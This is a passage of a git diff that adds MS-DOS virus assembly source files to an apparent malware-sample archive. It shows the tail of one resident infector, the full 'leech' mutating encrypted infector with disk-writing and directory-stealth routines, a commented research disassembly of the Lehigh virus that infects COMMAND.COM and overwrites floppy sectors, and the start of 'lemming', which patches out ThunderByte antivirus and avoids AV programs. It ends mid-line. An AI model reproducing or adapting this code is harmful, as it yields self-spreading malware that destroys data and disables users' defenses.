+int21DSDX: ; For int 21h calls + push ds ; with + lds dx,dword ptr [bp+2] ; DS:DX -> filename + call int21 + pop ds + retn + + cmp ax,4B00h ; Execute + je Execute + cmp ax,5252h ; ID check + je CheckID + cmp ah,30h ; DOS Version + je DosVersion +callorig21: ; Do other calls + jmp dword ptr cs:[int21store-start] +DosVersion: ; Why????? ; DOS Version + dec byte ptr cs:[tickstore-start] + jnz callorig21 ; Continue if not 0 + push es + xor ax,ax + push ax + mov es,ax + mov al,es:[46Ch] ; 40h:6Ch = Timer ticks + ; since midnight + and al,7 ; MOD 15 + inc ax + inc ax + mov cs:[tickstore-start],al ; # 2-17 + pop ax + pop es + iret +CheckID: ; ID Check + mov bx,0FFEEh ; FFEEh = -12h + iret +Execute: ; Execute + push ax ; Save registers + push cx + push es + push bx + push ds ; DS:DX -> filename + push dx ; save it on stack + push bp + mov bp,sp ; Set up stack frame + sub sp,0Ah ; Temporary variables + ; [bp-A] = attributes + ; [bp-8] = int 24 off + ; [bp-6] = int 24 seg + ; [bp-4] = file time + ; [bp-2] = file date + sti + push cs + pop ds + mov ax,3301h ; Turn off ^C check + xor dl,dl ; (never turn it back + call int21 ; on. Bug???) + mov ax,3524h ; Get int 24h + call int21 ; (Critical error) + mov [bp-8],bx + mov [bp-6],es + mov dx,int24-start + mov ax,2524h ; Set to new one + call int21 + mov ax,4300h ; Get attributes + call int21DSDX + jnc continue +doneinfect: + mov ax,2524h ; Restore crit error + lds dx,dword ptr [bp-8] ; handler + call int21 + cli + mov sp,bp + pop bp + pop dx + pop ds + pop bx + pop es + pop cx + pop ax + jmp short callorig21 ; Call orig handler +continue: + mov [bp-0Ah],cx ; Save attributes + test cl,1 ; Check if r/o???? + jz noclearattr + xor cx,cx + mov ax,4301h ; Clear attributes + call int21DSDX ; Filename in DS:DX + jc doneinfect ; Quit on error +noclearattr: + mov ax,3D02h ; Open read/write + call int21DSDX ; Filename in DS:DX + jc doneinfect ; Exit if error + mov bx,ax + mov ax,5700h ; Save time/date + call int21 + mov [bp-4],cx + mov [bp-2],dx + mov dx,buffer-start + mov cx,4 + mov ah,3Fh ; Read 4 bytes to + call int21 ; buffer + jc quitinf + cmp byte ptr ds:[buffer-start],0E9h; Must start with 0E9h + jne quitinf ; Otherwise, quit + mov dx,word ptr ds:[buffer+1-start]; dx = jmploc + dec dx + xor cx,cx + mov ax,4201h ; go there + call int21 + mov ds:[buffer-start],ax ; new location offset + mov dx,orig4-start + mov cx,4 + mov ah,3Fh ; Read 4 bytes there + call int21 + mov dx,ds:[orig4-start] + cmp dl,0E9h ; 0E9h means we might + jne infect ; already be there + mov ax,ds:[orig4+2-start] ; continue checking + add al,dh ; to see if we really + sub al,ah ; are there. + jz quitinf +infect: + xor cx,cx + mov dx,cx + mov ax,4202h ; Go to EOF + call int21 + mov ds:[buffer+2-start],ax ; save filesize + mov cx,204h + mov ah,40h ; Write virus + call int21 + jc quitinf ; Exit if error + sub cx,ax + jnz quitinf + mov dx,ds:[buffer-start] + mov ax,ds:[buffer+2-start] + sub ax,dx + sub ax,3 ; AX->jmp offset + mov word ptr ds:[buffer+1-start],ax; Set up buffer + mov byte ptr ds:[buffer-start],0E9h; code the jmp + add al,ah + mov byte ptr ds:[buffer+3-start],al + mov ax,4200h ; Rewind to jmploc + call int21 + mov dx, buffer-start + mov cx,4 ; Write in the jmp + mov ah,40h + call int21 +quitinf: + mov cx,[bp-4] + mov dx,[bp-2] + mov ax,5701h ; Restore date/time + call int21 + mov ah,3Eh ; Close file + call int21 + mov cx,[bp-0Ah] ; Restore attributes + mov ax,4301h + call int21DSDX + jmp doneinfect ; Return +ussr516 ends + end stub diff --git a/MSDOS/Virus.MSDOS.Unknown.leech.asm b/MSDOS/Virus.MSDOS.Unknown.leech.asm new file mode 100644 index 00000000..fafaeac8 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.leech.asm @@ -0,0 +1,498 @@ +code segment + assume cs:code + org 100h + +start: + jmp begin + + org 200h +begin: + jmp short beg + +FileSize dw 0E00h; 02h +int21vec dd 0 ; 04h +oldint13 dd 0 ; 08h +oldint24 dd 0 ; 0Ch +Date dw 0 ; 10h +Time dw 0 ; 12h + db 1 ; 14h +version dw 0 ; 15h - mutation status + +beg: + call codenext +codenext: + pop si +mutation1: + cli + push ds + pop es + mov bp,sp + mov sp,si + add sp,3FEh-(offset codenext-offset begin) +mutation2: + mov cx,ss + mov ax,cs + mov ss,ax + pop bx + dec sp + dec sp + add si,offset mybeg-offset codenext +codeloop: + pop ax + xor al,bh + push ax + dec sp + cmp sp,si + jnc codeloop +mybeg: + mov ax,es + dec ax + mov ds,ax + add word ptr ds:[3],-082h + mov bx,ds:[3] + mov byte ptr ds:[0],5ah + inc ax + inc bx + add bx,ax + mov es,bx + mov ss,cx + add si,offset begin-offset mybeg + mov bx,ds + mov ds,ax + mov sp,bp + push si + xor di,di + mov cx,400h + cld + rep movsb + pop si + push bx + mov bx,offset inblock-offset begin + push es + push bx + retf +inblock: + mov es,ax + mov ax,cs:[2] ; File Size + add ax,100h + mov di,si + mov si,ax + mov cx,400h + rep movsb + pop es + xor ax,ax + mov ds,ax + sti + cmp word ptr ds:[21h*4],offset int21-offset begin + jne count + sub word ptr es:[3],-082h + test byte ptr ds:[46ch],11100111b + jnz efect1 + push cs + pop ds + mov si,offset msg-offset begin +efect2: + lodsb + or al,0 + jz efect3 + mov ah,0eh + int 10h + jmp short efect2 +efect3: + mov ah,32h + xor dl,dl + int 21h + jc efect1 + call setaddr + call setint + mov dx,ds:[bx+10h] + mov ah,19h + int 21h + mov cx,2 + int 26h + pop bx + call setint +efect1: + jmp quit +count: + add word ptr es:[12h],-082h + mov bx,ds:[46ch] + push ds + push cs + pop ds + push cs + pop es + mov byte ptr ds:[14h],1 + and bh,80h + mov ds:[4ffh],bh + test bl,00000001b + jnz mut1 + mov si,offset mutation1-offset begin + add si,ds:[15h] + lodsb + xchg al,ds:[si] + mov ds:[si-1],al +mut1: + test bl,00000010b + jnz mut2 + mov si,offset mutation2-offset begin + add si,ds:[15h] + lodsw + xchg ax,ds:[si] + mov ds:[si-2],ax +mut2: + test bl,00000100b + jnz mut3 + mov si,offset codeloop-offset begin + mov al,2 + xor byte ptr ds:[si],al + xor byte ptr ds:[si+2],al + xor byte ptr ds:[si+3],al +mut3: + test bl,00001000b + jnz mut4 + mov si,offset codenext-offset begin + mov di,400h + mov cx,offset codeloop-offset codenext-2 + push si + push di + lodsb + cmp al,5eh + je jmp1 + inc si +jmp1: + push cx + rep movsb + pop cx + pop si + pop di + cmp al,5eh + je jmp2 + mov al,5Eh + stosb + rep movsb + mov al,90h + stosb + xor ax,ax + jmp short jmp3 +jmp2: + mov ax,0C68Fh + stosw + rep movsb + mov ax,1 +jmp3: + mov cs:[15h],ax +mut4: + mov ah,30h + int 21h + cmp ax,1e03h + jne nodos33 + mov ah,34h + int 21h + mov bx,1460h + jmp short dos33 +nodos33: + mov ax,3521h + int 21h +dos33: + mov ds:[4],bx + mov ds:[6],es + mov si,21h*4 + pop ds + push si + push cs + pop es + mov di,offset intend-offset begin+1 + movsw + movsw + pop di + push ds + pop es + mov ax,offset int21-offset begin + stosw + mov ax,cs + stosw + mov di,offset mybeg-offset begin + mov al,cs:[3ffh] +coderloop: + xor cs:[di],al + inc di + cmp di,offset coderloop-offset begin + jc coderloop +quit: + mov ah,62h + int 21h + push bx + mov ds,bx + mov es,bx + mov ax,100h + push ax + retf +;------------------------------------------------------------------------------ +infect: + push si + push ds + push es + push di + cld + push cs + pop ds + xor dx,dx + call movefp + mov dx,400h + mov ah,3fh + mov cx,3 + call Dos + jc infect4 + xor di,di + mov ax,word ptr ds:[400h] + mov cx,ds:[0] + cmp cx,ax + je infect8 + cmp al,0EBH ; near jmp + jne infect1 + mov al,ah + xor ah,ah + add ax,2 + mov di,ax +infect1: + cmp al,0E9h ; far jmp + jne infect2 + mov ax,ds:[401h] + add ax,3 + mov di,ax + xor ax,ax +infect2: + cmp ax,'MZ' + je infect4 + cmp ax,'ZM' + jne infect3 +infect4: + stc +infect8: + jmp infectquit +infect3: + mov dx,di + push cx + call movefp + mov dx,400h + mov ah,3fh + mov cx,dx + call Dos + pop cx + jc infect4 + cmp ds:[400h],cx + je infect8 + mov ax,di + sub ah,-4 + cmp ax,ds:[2] + jnc infect4 + mov dx,ds:[2] + call movefp + mov dx,400h + mov cx,dx + mov ah,40h + call Dos +infect6: + jc infectquit + mov dx,di + call movefp + push cs + pop es + mov di,400h + push di + push di + xor si,si + mov cx,di + rep movsb + mov si,400h+offset coderloop-offset begin + mov al,ds:[7ffh] +infect5: + xor ds:[si],al + inc si + cmp si,07ffh + jc infect5 + pop cx + pop dx + mov ah,40h + call Dos +infectquit: + pop di + pop es + pop ds + pop si + ret +int21: + cmp ax,4b00h + je exec + cmp ah,3eh + je close + cmp ah,11h + je dir + cmp ah,12h + je dir +intend: + db 0eah,0,0,0,0 + +dir: + push si + mov si,offset intend-offset begin+1 + pushf + call dword ptr cs:[si] + pop si + push ax + push bx + push es + mov ah,2fh + call dos + cmp byte ptr es:[bx],0ffh + jne dir2 + add bx,7 +dir2: + mov ax,es:[bx+17h] + and ax,1fh + cmp ax,1eh + jne dir1 + mov ax,es:[bx+1dh] + cmp ax,0801h + jc dir1 + sub ax,400h + mov es:[bx+1dh],ax +dir1: + pop es + pop bx + pop ax + iret +int24: + mov al,3 + iret +Dos: + pushf + call dword ptr cs:[4] + ret +moveFP: + xor cx,cx + mov ax,4200h + call Dos + ret +exec: + push ax + push bx + mov byte ptr cs:[14h],0 + mov ax,3d00h + call dos + mov bx,ax + mov ah,3eh + int 21h + pop bx + pop ax +intendjmp: + jmp short intend +close: + or byte ptr cs:[14h],0 + jnz intendjmp + push cx + push dx + push di + push es + push ax + push bx + call setaddr + call setint + mov ax,1220h + int 2fh + jc closequit + mov ax,1216h + mov bl,es:[di] + xor bh,bh + int 2fh + mov ax,es:[di+11h] + mov cs:[2],ax + mov ax,es:[di+0dh] + and al,0f8h + mov cs:[12h],ax + mov ax,es:[di+0fh] + mov cs:[10h],ax + cmp word ptr es:[di+29h],'MO' + jne closequit + cmp byte ptr es:[di+28h],'C' + jne closequit + cmp cs:[2],0FA00h + jnc closequit + mov al,20h + xchg al,es:[di+4] + mov ah,2 + xchg es:[di+2],ah + pop bx + push bx + push ax + call infect + pop ax + mov es:[di+4],al + mov es:[di+2],ah + mov cx,cs:[12h] + jc close1 + or cl,1fh + and cl,0feh +close1: + mov dx,cs:[10h] + mov ax,5701h + call Dos +closequit: + pop bx + pop ax + pop es + pop di + pop dx + pop cx + call dos + call setint + retf 02 +setaddr: + mov ah,13h + int 2fh + mov cs:[8d],bx + mov cs:[10d],es + int 2fh + mov cs:[12d],offset int24-offset begin + mov cs:[14d],cs + ret +setint: + push ax + push si + push ds + pushf + cli + cld + xor ax,ax + mov ds,ax + mov si,13h*4 + lodsw + xchg ax,cs:[8] + mov ds:[si-2],ax + lodsw + xchg ax,cs:[10d] + mov ds:[si-2],ax + mov si,24h*4 + lodsw + xchg ax,cs:[12d] + mov ds:[si-2],ax + lodsw + xchg ax,cs:[14d] + mov ds:[si-2],ax + popf + pop ds + pop si + pop ax + ret +msg: + db 'The leech live ...',0 + db 'April 1991 The Topler.',0 + + org 0F00h + + int 20h + +code ends + end start + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.lehigh.asm b/MSDOS/Virus.MSDOS.Unknown.lehigh.asm new file mode 100644 index 00000000..5d3e42a5 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.lehigh.asm @@ -0,0 +1,315 @@ + page 65,132 + title The 'Lehigh' Virus +; ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» +; º British Computer Virus Research Centre º +; º 12 Guildford Street, Brighton, East Sussex, BN1 3LS, England º +; º Telephone: Domestic 0273-26105, International +44-273-26105 º +; º º +; º The 'Lehigh' Virus º +; º Disassembled by Joe Hirst, July 1989 º +; º  º +; º Copyright (c) Joe Hirst 1989. º +; º º +; º This listing is only to be made available to virus researchers º +; º or software writers on a need-to-know basis. º +; ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ + + ; The disassembly has been tested by re-assembly using MASM 5.0. + +CODE SEGMENT BYTE PUBLIC 'CODE' + ASSUME CS:CODE,DS:CODE + + ; Interrupt 21H routine + +BP0010: PUSH AX + PUSH BX + CMP AH,4BH ; Load function? + JE BP0020 ; Branch if yes + CMP AH,4EH ; Find file file? + JE BP0020 ; Branch if yes + JMP BP0170 ; Pass interrupt on + + ; Load or find file function + +BP0020: MOV BX,DX ; Get pathname pointer + CMP BYTE PTR [BX+1],':' ; Is a disk specified? + JNE BP0030 ; Branch if not + MOV AL,[BX] ; Get disk letter + JMP BP0040 + + ; Is there a COMMAND.COM on disk? + +BP0030: MOV AH,19H ; Get current disk function + INT 44H ; DOS service (diverted INT 21H) + ADD AL,'a' ; Convert to letter +BP0040: PUSH DS + PUSH CX + PUSH DX + PUSH DI + PUSH CS ; \ Set DS to CS + POP DS ; / + MOV BX,OFFSET PATHNM ; Address pathname + MOV [BX],AL ; Store disk letter in pathname + MOV DX,BX ; Move pathname address + MOV AX,3D02H ; Open handle (R/W) function + INT 44H ; DOS service (diverted INT 21H) + JNB BP0050 ; Branch if no error + JMP BP0160 ; Restore registers and terminate + + ; Is COMMAND.COM infected? + +BP0050: MOV BX,AX ; Move file handle + MOV AX,4202H ; Move file pointer function (EOF) + XOR CX,CX ; \ No offset + MOV DX,CX ; / + INT 44H ; DOS service (diverted INT 21H) + MOV DX,AX ; Copy file length + MOV FILELN,AX ; Save file length + SUB DX,2 ; Address last word of file + MOV AX,4200H ; Move file pointer function (start) + INT 44H ; DOS service (diverted INT 21H) + MOV DX,OFFSET BUFFER ; Address read buffer + MOV CX,2 ; Length to read + MOV AH,3FH ; Read handle function + INT 44H ; DOS service (diverted INT 21H) + CMP WORD PTR BUFFER,65A9H ; Is file infected? + JNE BP0060 ; Branch if not + JMP BP0080 + + ; Infect COMMAND.COM + +BP0060: XOR DX,DX ; \ No offset + MOV CX,DX ; / + MOV AX,4200H ; Move file pointer function (start) + INT 44H ; DOS service (diverted INT 21H) + MOV CX,3 ; Length to read + MOV DX,OFFSET BUFFER ; Address read buffer + MOV DI,DX ; Copy address + MOV AH,3FH ; Read handle function + INT 44H ; DOS service (diverted INT 21H) + MOV AX,[DI+1] ; Get displacement from initial jump + ADD AX,0103H ; Convert to address for COM file + MOV ENTPTR,AX ; Save file entry address + MOV DX,FILELN ; Get file length + SUB DX,OFFSET ENDADR ; Subtract length of virus + DEC DX ; ...and one more + MOV [DI],DX ; Put offset into jump instruction + XOR CX,CX ; Clear high offset for move + MOV AX,4200H ; Move file pointer function (start) + INT 44H ; DOS service (diverted INT 21H) + MOV AL,INFCNT ; Get infection count + PUSH AX ; Preserve infection count + MOV BYTE PTR INFCNT,0 ; Set infection count to zero + MOV CX,OFFSET ENDADR ; \ Get length of virus + INC CX ; / + XOR DX,DX ; Address start of virus + MOV AH,40H ; Write handle function + INT 44H ; DOS service (diverted INT 21H) + POP AX ; Recover infection count + MOV INFCNT,AL ; Restore original infection count + XOR CX,CX ; \ Address second byte of program + MOV DX,1 ; / + MOV AX,4200H ; Move file pointer function (start) + INT 44H ; DOS service (diverted INT 21H) + MOV AX,[DI] ; Get virus offset + ADD AX,OFFSET BP0180 ; Add entry point + SUB AX,3 ; Subtract length of jump instruction + MOV [DI],AX ; Replace offset + MOV DX,DI ; Address stored offset + MOV CX,2 ; Length to write + MOV AH,40H ; Write handle function + INT 44H ; DOS service (diverted INT 21H) + INC BYTE PTR INFCNT ; Increment infection count + CMP BYTE PTR INFCNT,4 ; Have we reached target? + JB BP0070 ; Branch if not + JMP BP0110 ; Trash disk + + ; Is disk A or B? + +BP0070: MOV BYTE PTR N_AORB,0 ; Set off "not A or B" switch + CMP BYTE PTR CURDSK,2 ; Is current disk A or B? + JB BP0080 ; Branch if yes + MOV BYTE PTR N_AORB,1 ; Set on "not A or B" switch +BP0080: MOV AH,3EH ; Close handle function + INT 44H ; DOS service (diverted INT 21H) + CMP BYTE PTR N_AORB,1 ; Is "not A or B" switch on? + JE BP0090 ; Branch if yes + JMP BP0160 ; Restore registers and terminate + + ; Disk not A or B + +BP0090: MOV BYTE PTR N_AORB,0 ; Set off "not A or B" switch + MOV BX,OFFSET PATHNM ; Address pathname + MOV AL,CURDSK ; Get current disk + ADD AL,'a' ; Convert to letter + MOV [BX],AL ; Store letter in pathname + MOV DX,BX ; Move pathname address + MOV AX,3D02H ; Open handle (R/W) function + INT 44H ; DOS service (diverted INT 21H) + JNB BP0100 ; Branch if no error + JMP BP0160 ; Restore registers and terminate + + ; Set infection count same as in current program + +BP0100: MOV BX,AX + MOV AX,4202H ; Move file pointer function (EOF) + XOR CX,CX ; \ No offset + MOV DX,CX ; / + INT 44H ; DOS service (diverted INT 21H) + MOV DX,AX ; \ Address back to infection count + SUB DX,7 ; / + MOV AX,4200H ; Move file pointer function (start) + INT 44H ; DOS service (diverted INT 21H) + MOV CX,1 ; Length to write + MOV DX,OFFSET INFCNT ; Address infection count + MOV AH,40H ; Write handle function + INT 44H ; DOS service (diverted INT 21H) + MOV AH,3EH ; Close handle function + INT 44H ; DOS service (diverted INT 21H) + JMP BP0160 ; Restore registers and terminate + + ; Trash disk + +BP0110: MOV AL,CURDSK ; Get current disk + CMP AL,2 ; Is disk A or B? + JNB BP0150 ; Branch if not + MOV AH,19H ; Get current disk function + INT 44H ; DOS service (diverted INT 21H) + MOV BX,OFFSET PATHNM ; Address pathname + MOV DL,[BX] ; Get drive letter from pathname + CMP DL,'A' ; Is drive letter 'A'? + JE BP0120 ; Branch if yes + CMP DL,'a' ; Is drive letter 'a'? + JE BP0120 ; Branch if yes + CMP DL,'b' ; Is drive letter 'b'? + JE BP0130 ; Branch if yes + CMP DL,'B' ; Is drive letter 'B'? + JE BP0130 ; Branch if yes + JMP BP0160 ; Restore registers and terminate + + ; Drive A + +BP0120: MOV DL,0 ; Set drive A + JMP BP0140 + + ; Drive B + +BP0130: MOV DL,1 ; Set drive B +BP0140: CMP AL,DL ; Is this the same as current? + JNE BP0150 ; Branch if not + JMP BP0160 ; Restore registers and terminate + + ; Write lump of BIOS to floppy disk + +BP0150: MOV SI,0FE00H ; \ Address BIOS (?) + MOV DS,SI ; / + MOV CX,0020H ; Write 32 sectors + MOV DX,1 ; Start at sector one + INT 26H ; Absolute disk write + POPF + MOV AH,9 ; Display string function + MOV DX,1840H + INT 44H ; DOS service (diverted INT 21H) +BP0160: POP DI + POP DX + POP CX + POP DS +BP0170: POP BX + POP AX + JMP CS:INT_21 ; Branch to original Int 21H + + ; Original Int 21H vector + +INT_21 EQU THIS DWORD + DW 138DH ; Int 21H offset + DW 0295H ; Int 21H segment + + ; Entry point for infected program + +BP0180: CALL BP0190 ; \ Get current address +BP0190: POP SI ; / + SUB SI,3 ; Address back to BP0180 + MOV BX,SI ; \ Address of virus start + SUB BX,OFFSET BP0180 ; / + PUSH BX ; Save address of virus start + ADD BX,OFFSET FILELN ; Address file length + MOV AH,19H ; Get current disk function + INT 21H ; DOS service + MOV [BX-1],AL ; Save current disk + MOV AX,[BX] ; Get file length + ADD AX,0100H ; Add PSP length + MOV CL,4 ; \ Convert to paragraphs + SHR AX,CL ; / + INC AX ; Allow for remainder + MOV BX,AX ; Copy paragraphs to keep + MOV AH,4AH ; Set block function + INT 21H ; DOS service + JNB BP0200 ; Branch if no error + JMP BP0220 ; Pass control to host + + ; Allocate memory for virus + +BP0200: MOV CL,4 ; Bits to move + MOV DX,OFFSET ENDADR ; Length of virus + SHR DX,CL ; Convert to paragraphs + INC DX ; Allow for remainder + MOV BX,DX ; Copy paragraphs for virus + MOV AH,48H ; Allocate memory function + INT 21H ; DOS service + JNB BP0210 ; Branch if no error + JMP BP0220 ; Pass control to host + + ; Install virus in memory + +BP0210: PUSH ES + PUSH AX ; Preserve allocated memory segment + MOV AX,3521H ; Get Int 21H function + INT 21H ; DOS service + MOV [SI-4],BX ; Save Int 21H offset + MOV [SI-2],ES ; Save Int 21H segment + POP ES ; Recover allocated memory segment + PUSH SI + SUB SI,OFFSET BP0180 ; Address back to start of virus + XOR DI,DI ; Target start of new area + MOV CX,OFFSET ENDADR ; \ Length of virus + INC CX ; / + REPZ MOVSB ; Copy virus to new area + POP SI + PUSH DS + MOV DX,[SI-4] ; Get Int 21H offset + MOV AX,[SI-2] ; \ Set DS to Int 21H segment + MOV DS,AX ; / + MOV AX,2544H ; Set Int 44H function + INT 21H ; DOS service + PUSH ES ; \ Set DS to ES + POP DS ; / + XOR DX,DX ; Interrupt 21H routine (BP0010) + MOV AX,2521H ; Set Int 21H function + INT 44H ; DOS service (diverted INT 21H) + POP DS + POP ES +BP0220: POP BX + PUSH ENTPTR[BX] ; Push COM file entry address + RET ; ...and return to it + +PATHNM DB 'b:\command.com', 0 ; Pathname +BUFFER DB 7FH, 58H, 0BH, 0, 0 ; Read buffer +ENTPTR DW 0CB0H ; File entry address +N_AORB DB 0 ; "Not A or B" switch +INFCNT DB 0 ; Infection count + DB 0 +CURDSK DB 0 ; Current disk +FILELN DW 5AAAH ; File length + DW 65A9H ; Infection indicator + +ENDADR EQU $-1 + +CODE ENDS + + END + +; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ +; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> and Remember Don't Forget to Call <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ +; ÄÄÄÄÄÄÄÄÄÄÄÄ> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <ÄÄÄÄÄÄÄÄÄÄ +; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + diff --git a/MSDOS/Virus.MSDOS.Unknown.lemming.asm b/MSDOS/Virus.MSDOS.Unknown.lemming.asm new file mode 100644 index 00000000..1cd7a189 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.lemming.asm @@ -0,0 +1,1125 @@ +.286 +.model tiny +.code + +virus_size equ vir_end - start +virus_siz equ virus_size + virus_size +decrypt_size equ handle - next_function +data_size equ vir_end - step1 +engine_size equ next_function - start +Int21_base equ 021h*4 +timer_seg equ 01ch*4+2 +virus_paragraphs equ virus_size * 2/16 + +code segment + assume cs:code,ds:code,es:code + + +progr equ 0100h + org progr + +main: +start: + mov cx,decrypt_size + lea si,next_function + call ofset +ofset: pop bp + sub bp,109h ;Set postion of base pointer +decrypt: + xor byte ptr cs:[si][bp],00 ;Anti heuristic decryptor +key: ;will fool Thunderbyte. + jcxz next_function + dec cx + inc si + jmp decrypt + +fooled_tbav: + + +next_function: + push es + push ds + push cs + pop ds + call getcpu ;Detect CPU + je _8086 + mov ax,0fffeh ;Determine if installed + int 21h + cmp bx,0ffffh ;Returns ffff in bx if so... + +test_processor: + jne install__ +_8086: jmp end_install ;Not 80286 compatible + +transfer: + call get_int21 + mov di,0100h + push cs + pop ds + lea si,word ptr cs:start[bp] + mov cx,virus_size +move: + rep movsb ;Move virus and make resident + +copied: + + call set_int21 ;Set int 21 to virus + jmp end_install + +install__ proc near + push ds es + call anti_av ;Detect the presence of TBDRIVER + pop es ds ;and patch + mov ax,5802h ;are umb's available? + int 21h + jc install_low ;no then install in low memory + mov ax,5803h ;Chain mcb's into low memory + mov bx,1 + int 21h + jc install_low + push es ;get current mcb + pop dx + dec dx + mov di,3 ;add to current mcb to get + ;pointer to next mcb +walk: mov es,dx + cmp byte ptr es:[di-3],05ah + je lastmcb + add dx,word ptr es:di + inc dx ;search for last mcb. + mov es,dx + cmp byte ptr es:[di-3],05ah + jne walk +lastmcb: + mov ax,5803h ;remove umb link + xor bx,bx + int 21h + cmp word ptr es:[di],virus_paragraphs + ja hi_install ;Enough memory for UMB install? + push cs + pop es + jmp install_low +hi_install: + inc dx + mov es,dx ;es points to virus new CS +install_low: + push es + xor di,di + push es ;original psp segment + pop dx + dec dx + mov es,dx + cmp byte ptr es:[di],5ah + jne end_install + mov ax,virus_siz + mov cl,4 + shr ax,cl + inc ax + inc ax + sub word ptr es:[di+3],ax ; + mov ax,word ptr es:[di+3] ;copy last mcb size into ax + pop cx + add cx,ax ;new segment + sub cx,10h + mov word ptr cs:new_seg[bp],cx + mov es,cx + jmp transfer ;go and move virus to new + ;memory position +install__ endp + +end_install: + pop ds + pop es + lea di,word ptr cs:buffer1[bp] + mov ax,05a4dh + cmp word ptr cs:[di],ax + jne goto_com + mov ax,word ptr cs:[di+16h] + push es + pop bx + + add bx,10h + add ax,bx ;code segment + + mov cx,word ptr cs:[di+0eh] ;get original ss + mov dx,word ptr cs:[di+10h] ;get original sp + add cx,bx + cli + mov ss,cx ;restore original ss and sp + mov sp,dx + sti + push ax + mov bx,word ptr cs:[di+14h] ;get original ip + push bx + call clear_reg ;clear all registers + retf ;and hand back control + +goto_com: + cld + lea si,buffer1[bp] ;restore com entry point + mov di,0100h + mov cx,18h + rep movsb + push 0100h + call clear_reg + ret ;hand back control + +clear_reg: + xor ax,ax + xor bx,bx + xor cx,cx + xor dx,dx + xor si,si + xor di,di + xor bp,bp + ret + +anti_av proc near +; DISABLE TBDRIVER AGAINST TUNNELING DETECT + + mov ax,5200h + int 21h ;es:bx + add bx,22h ;pointer to first device 'NUL' + ;or 'CON' +next_search: + cld + lds si,word ptr es:bx + cmp si,-1 + je not_found + push ds cs + pop es + lea di,scan[bp] + push si + add si,10 ;device name offset + ;from bx pointer + mov cx,5 + rep cmpsb ;search for device name + pop bx es + jne next_search +found: ;If TBDRIVER is found then + push ds ;patch against tunneling + pop es + push cs + pop ds + mov di,bx + xor ax,ax + lea si,scan_string[bp] +next_char: + inc ax + mov cx,5 + push si + rep cmpsb ;search for string + pop si + je bullseye + cmp ax,10116 + je not_found + jmp next_char + +bullseye: + mov es:[di-12],09090h ;disable tbdriver +not_found: + ret + scan db 'TBDRV' + scan_string db 0fah,09ch,0fch,053h,050h +anti_av endp + + +VirName db 0dh,0ah,'The Rise and Fall of ThunderByte-1994-Australia.',0dh,0ah + db ' You Will Never Trust Anti-Virus Software Again!! ',0dh,0ah + db '[LEMMING] ver .99á' + +Anti_tbscan proc near + + push es ds si di ax bx cx dx + push bx + lea si,Tbscan + lea bx,tbscan_size + mov byte ptr cs:no_scasb_flag,0 + call tbscan_test ;Is Tbscan being executed? + pop bx + jnc not_tbscan + push cs + pop ds + call hook_int1c ; + les di, dword ptr es:bx+2 + push di + xor bx,bx + mov bl, byte ptr es:[di] + add di,bx ;di now points to end of C/T + lea si,tbscan_switch + cld + movsw + movsw + pop di + add byte ptr es:[di],3 +not_tbscan: + pop dx cx bx ax di si ds es + ret +tbscan_size db 0,6,6,0 +tbscan_switch db 20h,'c','o',0dh ;adding ' co' to command line + ;forces tbscan into Compat + ;mode +Anti_tbscan endp + +get_int21 proc near + push es + push ds + xor bx,bx + mov ds,bx + mov bx,word ptr ds:[84h] + mov es,word ptr ds:[86h] + pop ds + mov word ptr cs:int_21_off[bp],bx ;save vector for later calls + mov word ptr cs:int_21_seg[bp], es + mov word ptr cs:int_21_off_o[bp],bx + mov word ptr cs:int_21_seg_o[bp],es + call int_trace + pop es + ret +get_int21 endp + +set_int21 proc near + push es + + xor ax,ax + mov ds,ax + lea ax,word ptr cs:int_21 + mov bx,word ptr cs:new_seg[bp] + cli + mov ds:[134],bx + mov ds:[132],ax + sti + pop es + ret +set_int21 endp + +identify proc near + + ;on entry, ds:dx points to asciiz file to be run. + ;bx must point to file size table. EOT must be '0' + ;si must point to table of strings to compare. + ;direction_flag==0 for before '. e.g lemming.com' and 1 for after. + + push ds ;pointers to asciiz + push dx + mov cx,00ffh + mov al,'.' + push ds + pop es + push dx + pop di + cmp byte ptr cs:no_scasb_flag,1 + je no_scasb + cld + repne scasb +no_scasb: + xor ax,ax ;load index position (0). + xor cx,cx + push cs + pop ds +next_byte: + inc al + push ax + push di ;save position + push si + xlat + or al,al ;end of index? + jz no_match ;yes? + cmp byte ptr cs:direction_flag,1 + je right + sub di,8 ;back up to begining of name + cmp byte ptr cs:no_scasb_flag,1 + je right + add di,8 + sub di,ax + dec di +right: mov cl,al ;bytes to count... + rep cmpsb + je match_found + pop si + add si,ax ;if not equal, next field + pop di + pop ax + jmp next_byte + +match_found: + clc + jmp clear + +no_match: stc + +clear: pop ax + pop ax + pop ax + pop dx + pop ds + ret + + direction_flag db 0 + no_scasb_flag db 0 +identify endp + + +do_not_infect proc near ;Table of files not to infect +start_: + AVSize db 4,4,6,3,5,5,0 + AVName :db 'TBAV' + TBSCAN: db 'TBSCAN' + db 'NAV' + db 'VSAFE' + db 'FPROT' + +do_not_infect endp +is_file_infectable proc near + +extension_size db 